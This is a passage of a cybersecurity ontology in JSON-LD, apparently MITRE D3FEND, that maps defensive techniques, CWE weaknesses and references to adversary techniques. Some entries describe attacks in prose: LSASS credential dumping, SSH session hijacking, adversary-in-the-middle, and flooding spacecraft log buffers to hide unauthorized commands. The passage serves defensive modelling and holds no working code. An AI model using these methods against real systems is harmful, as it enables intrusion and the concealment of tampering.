      "d3f:kb-mitre-analysis": "This patent includes the description of a method of blocking email traffic from untrusted domains by analyzing the TCP/IP source IP addresses and blocking traffic for IPs whose reverse lookup response FQDN matches a denylist.",
      "d3f:kb-reference-title": "Apparatus for to provide content to and query a reverse domain name system server",
      "rdfs:label": "Reference - Apparatus for to provide content to and query a reverse domain name system server - Barrracuda Networks"
    },
    {
      "@id": "d3f:Reference-DigitalIdentityGuidelines800-63-3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63-3.pdf"
      },
      "d3f:kb-author": "NIST",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:One-timePassword"
        },
        {
          "@id": "d3f:StrongPasswordPolicy"
        }
      ],
      "d3f:kb-reference-title": "Digital Identity Guidelines",
      "rdfs:label": "Reference - Digital Identity Guidelines 800-63-3"
    },
    {
      "@id": "d3f:Reference-Computer-implementedMethodsAndSystemsForIdentifyingVisuallySimilarTextCharacterStrings_GreathornInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10320815B2/en?oq=US-10320815-B2"
      },
      "d3f:kb-abstract": "Methods and systems are disclosed for selecting text character strings from a corpus of relevant strings that would commonly be considered to be visually similar to human viewer to an input string. The initial corpus may be any sufficiently broad or specific source of text, e.g., the names of users in a computer application system. The character strings in the corpus are classified such that direct, character-by-character comparisons may be limited to a small subset of likely-similar strings. The input string is then directly compared to strings that are likely to be similar to it, taking into account individual characters' similarities, combinations of characters that look similar to individual characters, transposition of characters, and simple additions and deletions.",
      "d3f:kb-author": "Raymond W. Wallace, III",
      "d3f:kb-mitre-analysis": "Text input is compared to an engine of look-alike sets of text characters. An estimate of similar characters based on the engine is conducted, and an alert is triggered if the estimated similarity is lower than a given threshold.",
      "d3f:kb-organization": "Greathorn Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:HomoglyphDetection"
      },
      "d3f:kb-reference-title": "Computer-implemented methods and systems for identifying visually similar text character strings",
      "rdfs:label": "Reference - Computer-implemented methods and systems for identifying visually similar text character strings - Greathorn Inc"
    },
    {
      "@id": "d3f:T1021.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1021.008",
      "d3f:definition": "Adversaries may leverage [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the [Cloud API](https://attack.mitre.org/techniques/T1059/009), such as Azure Serial Console(Citation: Azure Serial Console), AWS EC2 Instance Connect(Citation: EC2 Instance Connect)(Citation: lucr-3: Getting SaaS-y in the cloud), and AWS System Manager.(Citation: AWS System Manager).",
      "rdfs:label": "Direct Cloud VM Connections",
      "rdfs:subClassOf": {
        "@id": "d3f:T1021"
      }
    },
    {
      "@id": "d3f:T1153",
      "@type": "owl:Class",
      "d3f:attack-id": "T1153",
      "d3f:definition": "**This technique has been deprecated and should no longer be used.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated and should no longer be used.**",
      "rdfs:label": "Source",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:Hostname",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DomainName"
      ],
      "d3f:definition": "In computer networking, a hostname (archaically nodename) is a label that is assigned to a device connected to a computer network and that is used to identify the device in various forms of electronic communication, such as the World Wide Web. Hostnames may be simple names consisting of a single word or phrase, or they may be structured.",
      "d3f:identifies": {
        "@id": "d3f:Host"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Hostname"
      },
      "rdfs:label": "Hostname",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Identifier"
        },
        {
          "@id": "_:Neca4b59d2308413d8d5365ff5bfadb8e"
        }
      ],
      "skos:altLabel": "Nodename"
    },
    {
      "@id": "_:Neca4b59d2308413d8d5365ff5bfadb8e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:IOPortRestriction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IOPortRestriction"
      ],
      "d3f:d3fend-id": "D3-IOPR",
      "d3f:definition": "Limiting access to computer input/output (IO) ports to restrict unauthorized devices.",
      "d3f:filters": [
        {
          "@id": "d3f:InputDevice"
        },
        {
          "@id": "d3f:RemovableMediaDevice"
        }
      ],
      "d3f:isolates": {
        "@id": "d3f:IOModule"
      },
      "d3f:kb-article": "## How It works\n\nSoftware-based restriction uses agent software installed on a computer system. The agent software monitors all IO port system traffic. The agent software is configurable to limit the use of certain devices connected to IO ports. The restriction software can also be configured to limit the access to files and applications on external storage devices connected to IO ports.\n\nHardware-based restriction can also be employed to limit access to IO ports. For example, a hardware USB filter device that is placed between the host system and the external devices can filter IO port connections based on configurable rules. When new devices are connected to the USB filter the type of device is determined. Using an allow list a connection determination is made for the device.\n\nSome implementations detect when a device is connected in order to authorize the connection against a list of approved devices, in some cases by device type. For example, if the device is determined to be a storage device, then the contained files and executables are examined to more accurately identify the device type.\n\nTypes of restrictions that may be applied:\n- Device connection\n- Device command filtering\n- Device file system read or write restrictions\n\n## Considerations\n * Agent software will need to be installed on host systems\n * Configurations for allow/deny for devices and files will need to be maintained",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-ComputerMotherboardHavingPeripheralSecurityFunctions"
        },
        {
          "@id": "d3f:Reference-MethodAndSystemForControllingCommunicationPorts"
        },
        {
          "@id": "d3f:Reference-USBFilterForHubMaliciousCodePreventionSystem"
        }
      ],
      "rdfs:label": "IO Port Restriction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:N3e4e8f12e5fb4b9fb4fbd12d824b12d9"
        },
        {
          "@id": "_:N47da70d5b2de45c6aa3f86987121a5b3"
        },
        {
          "@id": "_:N346e163a413d4076b658ae809882d95d"
        }
      ]
    },
    {
      "@id": "_:N3e4e8f12e5fb4b9fb4fbd12d824b12d9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InputDevice"
      }
    },
    {
      "@id": "_:N47da70d5b2de45c6aa3f86987121a5b3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemovableMediaDevice"
      }
    },
    {
      "@id": "_:N346e163a413d4076b658ae809882d95d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IOModule"
      }
    },
    {
      "@id": "d3f:LinuxReadv",
      "@type": "owl:Class",
      "d3f:definition": "Read data into multiple buffers.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/readv.2.html"
      },
      "rdfs:label": "Linux Readv",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIReadFile"
      }
    },
    {
      "@id": "d3f:Reference-Entrust-What-Is-Token-Based-Authentication",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.entrust.com/resources/learn/what-is-token-based-authentication"
      },
      "d3f:kb-abstract": "Token-based authentication is an authentication protocol where users verify their identity in exchange for a unique access token. Users can then access the website, application, or resource for the life of the token without having to re-enter their credentials.",
      "d3f:kb-organization": "Entrust",
      "d3f:kb-reference-of": {
        "@id": "d3f:Token-basedAuthentication"
      },
      "d3f:kb-reference-title": "Identity Providers: What is Token Based Authentication",
      "rdfs:label": "Reference - Identity Providers: What is Token Based Authentication"
    },
    {
      "@id": "d3f:CyberSensor",
      "@type": "owl:Class",
      "d3f:definition": "A cyber sensor collects and monitors data related to cyber activities, events, or environments.",
      "rdfs:label": "Cyber Sensor",
      "rdfs:subClassOf": {
        "@id": "d3f:Sensor"
      }
    },
    {
      "@id": "d3f:CWE-153",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-153",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as substitution characters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Substitution Characters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:CWE-460",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-460",
      "d3f:definition": "The product does not clean up its state or incorrectly cleans up its state when an exception is thrown, leading to unexpected state or control flow.",
      "rdfs:label": "Improper Cleanup on Thrown Exception",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-459"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:ComputingImage",
      "@type": "owl:Class",
      "d3f:definition": "A computing image captures the full state or contents of a computing entity, such as a process or volume.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/System_image#Process_images"
      },
      "rdfs:label": "Computing Image",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:Reference-IntelControlEnforcementTechnology",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://software.intel.com/sites/default/files/managed/4d/2a/control-flow-enforcement-technology-preview.pdf"
      },
      "d3f:kb-organization": "Intel Corporation",
      "d3f:kb-reference-of": {
        "@id": "d3f:ControlFlowIntegrity"
      },
      "d3f:kb-reference-title": "Complex Shadow-Stack Updates (Intel Control-Flow Enforcement Technology)",
      "rdfs:label": "Reference - Control Enforcement Technology (CET) - Intel Corporation"
    },
    {
      "@id": "d3f:CWE-690",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-690",
      "d3f:definition": "The product does not check for an error after calling a function that can return with a NULL pointer if the function fails, which leads to a resultant NULL pointer dereference.",
      "rdfs:label": "Unchecked Return Value to NULL Pointer Dereference",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-252"
        },
        {
          "@id": "d3f:CWE-476"
        }
      ]
    },
    {
      "@id": "d3f:LM-0006.01",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0006.01",
      "d3f:definition": "In shared launches, multiple independent payloads cohabit common infrastructure until separation. If isolation is incomplete (e.g., shared data buses, mispartitioned deployer controllers, common logging/telemetry collectors, or cross-connected laptops and recorders), a compromise in one payload’s domain can be leveraged to observe or influence another’s traffic before release. Threat actors exploit these transient but real connections to read configuration, pivot through deployer control paths, or stage data/commands that execute as neighboring payloads power and check out, enabling cross-payload access or tampering prior to independent flight.",
      "rdfs:label": "Rideshare Payload - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0006/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LM-0006"
      },
      "skos:prefLabel": "Rideshare Payload"
    },
    {
      "@id": "d3f:T1204.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1204.004",
      "d3f:definition": "An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).",
      "rdfs:label": "Malicious Copy and Paste",
      "rdfs:subClassOf": {
        "@id": "d3f:T1204"
      }
    },
    {
      "@id": "d3f:Reference-SystemForImplementingThreatDetectionUsingThreatAndRiskAssessmentOfAsset-actorInteractions_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160191559A1"
      },
      "d3f:kb-abstract": "Disclosed is an approach to detect insider threats, by tracking unusual access activity for a specific user or computer with regard to accessing key assets over time. In this way, malicious activity and the different preparation phases of attacks can be identified.",
      "d3f:kb-author": "Himanshu Mhatre; David Lopes Pegna; Oliver Brdiczka",
      "d3f:kb-mitre-analysis": "The patent describes an insider threat detection system that analyzes packets sent within a network to identify and isolate malicious behavior. Current network traffic is collected and developed into a baseline that establishes the amount of data sent and received between a specific asset and a host. Current data transfer values are then compared with the baseline to identify anomalies.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:UserDataTransferAnalysis"
      },
      "d3f:kb-reference-title": "System for implementing threat detection using threat and risk assessment of asset-actor interactions",
      "rdfs:label": "Reference - System for implementing threat detection using threat and risk assessment of asset-actor interactions - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:CWE-708",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-708",
      "d3f:definition": "The product assigns an owner to a resource, but the owner is outside of the intended control sphere.",
      "rdfs:label": "Incorrect Ownership Assignment",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-282"
      }
    },
    {
      "@id": "d3f:OTHumanMachineInterface",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:HMIApplication"
        },
        {
          "@id": "d3f:InputDevice"
        },
        {
          "@id": "d3f:OutputDevice"
        }
      ],
      "d3f:definition": "Human-Machine Interfaces (HMIs) are systems used by an operator to monitor the real-time status of an operational process and to perform necessary control functions, including the adjustment of device parameters.",
      "d3f:modifies": {
        "@id": "d3f:OTLogicVariable"
      },
      "d3f:reads": {
        "@id": "d3f:OTProcessDataHistorian"
      },
      "d3f:synonym": "HMI",
      "rdfs:label": "OT Human Machine Interface",
      "rdfs:seeAlso": {
        "@id": "https://www.rockwellautomation.com/en-us/products/details.2711P-T12W21D8S.html#documentation"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEmbeddedComputer"
        },
        {
          "@id": "_:N0c6c8cc3a1c24fd8a326d622f89567f4"
        },
        {
          "@id": "_:N19ac79813cab442d9ade3328d44b3096"
        },
        {
          "@id": "_:N8887b9461cd64f8fac1d9d37f3bda85c"
        },
        {
          "@id": "_:Nb272ef0aeacf43fd8c79bc5ce703d770"
        },
        {
          "@id": "_:Nac3bf209034f450481ff184d571a54ff"
        }
      ]
    },
    {
      "@id": "_:N0c6c8cc3a1c24fd8a326d622f89567f4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HMIApplication"
      }
    },
    {
      "@id": "_:N19ac79813cab442d9ade3328d44b3096",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InputDevice"
      }
    },
    {
      "@id": "_:N8887b9461cd64f8fac1d9d37f3bda85c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutputDevice"
      }
    },
    {
      "@id": "_:Nb272ef0aeacf43fd8c79bc5ce703d770",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTLogicVariable"
      }
    },
    {
      "@id": "_:Nac3bf209034f450481ff184d571a54ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProcessDataHistorian"
      }
    },
    {
      "@id": "d3f:RegSetValueExA",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SetSystemConfigValue"
      ],
      "rdfs:label": "RegSetValueExA"
    },
    {
      "@id": "d3f:FileMagicBytes",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A specific type of header signature located at the beginning of a file, used to identify the file format.",
      "rdfs:label": "File Magic Bytes",
      "rdfs:subClassOf": {
        "@id": "d3f:FileHeaderBlockSignature"
      }
    },
    {
      "@id": "d3f:DE-0010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:abuses": {
        "@id": "d3f:EventLog"
      },
      "d3f:attack-id": "DE-0010",
      "d3f:definition": "The adversary hides activity by exhausting finite on-board logging and telemetry buffers so incriminating events are overwritten before they can be downlinked. Spacecraft typically use ring buffers with severity filters, per-subsystem quotas, and scheduled dump windows; by generating bursts of benign but high-frequency events (file listings, status queries, low-severity housekeeping, repeated mode toggles) or by provoking chatter from chatty subsystems, the attacker accelerates rollover. Variants target recorder indexes and event catalogs so new entries displace older ones, or they align floods with known downlink gaps and pass handovers when retention is shortest. To analysts on the ground, logs appear present but incomplete, showing a plausible narrative that omits the very interval when unauthorized commands or updates occurred.",
      "rdfs:label": "Overflow Audit Log - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0010/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTADefenseEvasionTechnique"
        },
        {
          "@id": "_:N65bc85e130c74bfa88d9b14ff4bebb6e"
        }
      ],
      "skos:prefLabel": "Overflow Audit Log"
    },
    {
      "@id": "_:N65bc85e130c74bfa88d9b14ff4bebb6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:abuses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:CWE-1105",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1105",
      "d3f:definition": "The product or code uses machine-dependent functionality, but it does not sufficiently encapsulate or isolate this functionality from the rest of the code.",
      "rdfs:label": "Insufficient Encapsulation of Machine-Dependent Functionality",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1061"
        },
        {
          "@id": "d3f:CWE-758"
        }
      ]
    },
    {
      "@id": "d3f:T1003.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": [
        {
          "@id": "d3f:AuthenticationService"
        },
        {
          "@id": "d3f:Process"
        }
      ],
      "d3f:attack-id": "T1003.001",
      "d3f:definition": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).",
      "rdfs:label": "LSASS Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:Nc33bef1359de465084ac1928eca25133"
        },
        {
          "@id": "_:Nca45034a6c1b409a86caadc32e36f5f9"
        }
      ]
    },
    {
      "@id": "_:Nc33bef1359de465084ac1928eca25133",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationService"
      }
    },
    {
      "@id": "_:Nca45034a6c1b409a86caadc32e36f5f9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:PointerValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-PV",
      "d3f:definition": "Ensuring that a pointer variable has the required properties for use.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-PointerValidationFunction_SEI"
      },
      "rdfs:label": "Pointer Validation",
      "rdfs:subClassOf": {
        "@id": "d3f:SourceCodeHardening"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeyRenamingEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the name of a registry key is changed, altering its identifier within the registry hierarchy.",
      "rdfs:label": "Windows Registry Key Renaming Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryKeyEvent"
        },
        {
          "@id": "_:N08bc2043e8d545ba82b8a815f7969cd4"
        }
      ]
    },
    {
      "@id": "_:N08bc2043e8d545ba82b8a815f7969cd4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKeyCreationEvent"
      }
    },
    {
      "@id": "d3f:WindowsDuplicateToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The DuplicateToken function creates a new access token that duplicates one already in existence.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtDuplicateToken"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetoken"
      },
      "rdfs:label": "Windows DuplicateToken",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPICopyToken"
        },
        {
          "@id": "_:Nc03c2619e914432d8c13706b5daa695f"
        }
      ]
    },
    {
      "@id": "_:Nc03c2619e914432d8c13706b5daa695f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtDuplicateToken"
      }
    },
    {
      "@id": "d3f:T0830",
      "@type": "owl:Class",
      "d3f:attack-id": "T0830",
      "d3f:definition": "Adversaries with privileged network access may seek to modify network traffic in real time using adversary-in-the-middle (AiTM) attacks. (Citation: Gabriel Sanchez October 2017) This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a AiTM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most-common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)",
      "rdfs:label": "Adversary-in-the-Middle - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Adversary-in-the-Middle"
    },
    {
      "@id": "d3f:Reference-UnifiedArchitectureFrameworkUAF",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.omg.org/spec/UAF/"
      },
      "d3f:kb-abstract": "UAF is an OMG standard that assists in development of architectural descriptions in commercial industry firms, federal government agencies and defense organizations. UAF has a variety of use cases from Enterprise and Mission architecting, to System of Systems (SoS) and Cyber-physical Systems engineering, as well as being an enabler for Digital Transformation efforts and for Department of Defense Architecture Framework (DoDAF) and NATO Architecture Framework (NAF) modeling. Architectural Descriptions in UAF are aligned with ISO/IEC/IEEE 42010:2011, Systems and software engineering -- Architecture description.",
      "d3f:kb-organization": "OMG",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DataExchangeMapping"
        },
        {
          "@id": "d3f:OperationalActivityMapping"
        },
        {
          "@id": "d3f:OperationalDependencyMapping"
        },
        {
          "@id": "d3f:OrganizationMapping"
        },
        {
          "@id": "d3f:ServiceDependencyMapping"
        },
        {
          "@id": "d3f:SystemDependencyMapping"
        }
      ],
      "d3f:kb-reference-title": "Unified Architecture Framework (UAF)",
      "rdfs:label": "Reference - Unified Architecture Framework (UAF)"
    },
    {
      "@id": "d3f:NetworkMultimediaStreamingResource",
      "@type": "owl:Class",
      "d3f:definition": "A server that provides digital multimedia content to users.",
      "rdfs:label": "Network Multimedia Streaming Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkMediaStreamingResource"
      }
    },
    {
      "@id": "d3f:Multi-factorAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Multi-factorAuthentication"
      ],
      "d3f:d3fend-id": "D3-MFA",
      "d3f:definition": "Requiring proof of two or more pieces of evidence in order to authenticate a user.",
      "d3f:kb-article": "## How it works\nWhen logging into an account users present two or more credentials that fall into different categories: something you know (password or PIN), something you have (smart card or phone), or something you are (fingerprint).\n\n## Considerations\nMFA configuration steps may vary across accounts and in some cases left up to users to activate and implement.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodAndApparatusForUtilizingATokenForResourceAccess_RsaSecurityInc."
      },
      "d3f:uses": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Multi-factor Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AgentAuthentication"
        },
        {
          "@id": "_:N36424594c0ee46b5862e48bb7cb22f98"
        }
      ]
    },
    {
      "@id": "_:N36424594c0ee46b5862e48bb7cb22f98",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:Reference-LeverageSecurityFrameworksLibraries_OWASP",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://top10proactive.owasp.org/archive/2018/c2-leverage-security-frameworks-libraries/"
      },
      "d3f:kb-organization": "OWASP",
      "d3f:kb-reference-of": {
        "@id": "d3f:TrustedLibrary"
      },
      "d3f:kb-reference-title": "Leverage Security Frameworks and Libraries",
      "rdfs:label": "Reference - Leverage Security Frameworks and Libraries - OWASP"
    },
    {
      "@id": "d3f:InboundInternetEncryptedWebTraffic",
      "@type": "owl:Class",
      "d3f:definition": "Inbound internet web traffic is network traffic that is: (a) on an incoming connection initiated from a host outside the network to a host within a network, and (b) using a standard web encryption protocol.",
      "rdfs:label": "Inbound Internet Encrypted Web Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InboundInternetEncryptedTraffic"
        },
        {
          "@id": "d3f:InboundInternetWebTraffic"
        }
      ]
    },
    {
      "@id": "d3f:CWE-159",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-159",
      "d3f:definition": "The product does not properly filter, remove, quote, or otherwise manage the invalid use of special elements in user-controlled input, which could cause adverse effect on its behavior and integrity.",
      "rdfs:label": "Improper Handling of Invalid Use of Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:HardwareDeviceMoveEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a device is relocated or reassigned within a system or network, potentially affecting its operational scope or connectivity.",
      "rdfs:label": "Hardware Device Move Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDeviceStateEvent"
      }
    },
    {
      "@id": "d3f:AccessDeniedEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating the refusal of access to a resource, where an access request has been evaluated and denied based on current authorization policies, preventing operations by the requesting agent.",
      "rdfs:label": "Access Denied Event",
      "rdfs:subClassOf": {
        "@id": "d3f:AccessMediationEvent"
      }
    },
    {
      "@id": "d3f:CWE-1243",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1243",
      "d3f:definition": "Access to security-sensitive information stored in fuses is not limited during debug.",
      "rdfs:label": "Sensitive Non-Volatile Information Not Protected During Debug",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1263"
      }
    },
    {
      "@id": "d3f:WindowsResumeThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Decrements a thread's suspend count. When the suspend count is decremented to zero, the execution of the thread is resumed.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtResumeThread"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-resumethread"
      },
      "rdfs:label": "Windows ResumeThread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIResumeThread"
        },
        {
          "@id": "_:Nd99aa46a7528407b94e9e1b960d1bfab"
        }
      ]
    },
    {
      "@id": "_:Nd99aa46a7528407b94e9e1b960d1bfab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtResumeThread"
      }
    },
    {
      "@id": "d3f:OTDebugCommand",
      "@type": "owl:Class",
      "d3f:definition": "Investigate or analyze the current state of the system.",
      "rdfs:comment": [
        "BACnet: getEnrollmentSummary\nBACnet: confirmed-audit-notification\nBACnet: audit-log-query\nBACnet: unconfirmed-audit-notification ",
        "Modbus: Get Comm. Event Log\nModbus: Return Query Data\nModbus: Clear Counters\nModbus: Get Comm. Event Counters"
      ],
      "rdfs:label": "OT Debug Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDiagnosticsMessage"
      }
    },
    {
      "@id": "d3f:T1563.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:SSHSession"
      },
      "d3f:attack-id": "T1563.001",
      "d3f:definition": "Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.",
      "rdfs:label": "SSH Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1563"
        },
        {
          "@id": "_:N51f8aa1e146d4ea3919da3fa7293ed41"
        }
      ]
    },
    {
